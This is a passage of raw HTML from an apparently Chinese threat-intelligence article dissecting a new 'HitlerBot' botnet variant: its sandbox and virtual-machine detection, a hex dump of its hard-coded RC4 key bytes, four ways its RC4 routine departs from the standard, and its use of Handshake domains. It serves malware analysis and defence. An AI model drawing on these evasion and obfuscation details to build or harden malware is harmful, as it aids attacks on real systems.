0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.2. 运行环境检测</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HitlerBot新变种运行后会检测自身运行环境，若未带运行参数，或者运行在虚拟环境中，则终止运行以实现反沙箱、反虚拟机功能。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023846" data-ratio="0.1285310734463277" data-w="708" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=5c69bb0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySGac0Bg7Ovjh3XuOf748bEYjfa0roy6qoFlfFJLySibmCwiaNfHjpLBZw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">其检测虚拟环境的代码如下（arm、mips架构则检测QEMU特征）：</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023847" data-ratio="0.5926430517711172" data-w="734" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=47e3cb8f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySX3x1GyH6olnZ4rMEy8Thd0T7QpdYNMVofhCicOZl5nqa8OmsGCkVNMg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.3. 初始化配置表</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">新变种运行后会在table_init()中对其配置表进行初始化，每个表项均使用魔改rc4加密。rc4_key_1占128字节，含96个硬编码字节（6个16字节单元），剩余部分为32个0字节，96个硬编码字节如下：</span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;">0000  24 2F 73 EB 94 C9 64 D7 B7 D1 1D F3 79 26 52 F9  $/së”Éd×·Ñ.óy&amp;Rù </span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">0010  7D CE 01 64 95 1A CD 5E F4 B4 02 FB 50 CF 4E 75  }Î.d•.Í^ô´.ûPÏNu </span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">0020  FE C1 60 92 8B C4 69 42 96 87 35 0F AD 87 09 2B  þÁ`’‹ÄiB–‡5.­‡.+ </span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">0030  55 0A 8F EA 24 5C 48 18 11 4B 13 61 1A 62 D6 18  U.</span></span></p></td></tr></tbody></table><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">（</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;8 5 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">魔改rc4加密</span></span><span leaf="">）变形1：在初始化S盒的密钥调度阶段（KSA），使用3次xor操作实现Sbox1元素交换，而非原始直接交换Sbox1元素。</span></span></p></div></div><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023848" data-ratio="0.5838150289017341" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=a4d579ac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySNcgFHAo7CIYILIlZcXH5I9ZM1zu5E2tDqXWxR52wEcUNA9sJYG6zCA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">（</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;8 5 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">魔改rc4加密</span></span><span leaf="">）变形2：伪随机数生成阶段（PRGA）引入seed，默认使用长态RNG，具体调用关系是：srandom ( )-&gt;srandom_r( ) -&gt;random_r( )、rand ( )-&gt;random_r( )。srandom_r( )、random_r( )代码如下：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023849" data-ratio="0.10057803468208093" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=08bdea33&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySplKS1el6t3248kY3K7mdNMBGY1WQpGucF5sGfTrevFTIQib64G4645g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023850" data-ratio="0.8971098265895954" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=c93a1540&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJyS3O8gRNMB1IIY1RODMY9ykszo4ztr4EI5gHsSs8Gia5ibJRNzYAYTqGrw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023851" data-ratio="0.9641618497109826" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=5dad065c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJyS1Lj6WurvbnwCxBQtA7xvyf5IW4PajibTmmnEIyaxGvn5kqHFtr54BCg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">（</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;8 5 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">魔改rc4加密</span></span><span leaf="">）变形3：密钥流生成阶段，分两种情况更新S盒的状态。case1：若计数器enc_str_len_counter = 3N，则使用3次xor操作实现Sbox1元素交换；case2：计数器enc_str_len_counter ≠ 3N，则对index为偶数的字节额外处理以更新Sbox1（首个index=0）。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023852" class="rich_pages wxw-img" data-ratio="0.17341040462427745" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=f5221959&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySVib2XO7uXswDJyDPJDkY0jNVBvl1I8ibTqSkWnIib0f4Ok1GqYaBa8B9w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023853" data-ratio="0.2971098265895954" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=9a6118b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySGfdMTbVU1mlPw0MUgbia5xGkn5a4nDo0XIC4GMUAEib6RbOpLUdlLiafQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023855" data-ratio="0.6126984126984127" data-w="630" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=5b070af5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySRrtxxvmLplAuYz8ia2IiawkGGYkf3Ogn41FjSicCHtJJpfUMv59VPgC3w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">（</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;8 5 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">魔改rc4加密</span></span><span leaf="">）变形4：xor解密阶段，引入3个随机数。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023856" data-ratio="0.4578034682080925" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=24f0bb6d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJyStho4SXzHGzNsXSgsrk3CnQwAwAadRczvpZNs1yPcRzQ3N6jaZk3etQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">最终，解密后的部分配置表项如下，可看到该新变种首次使用了Handshake域名（如：.1、.elite等顶级域名）。</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, 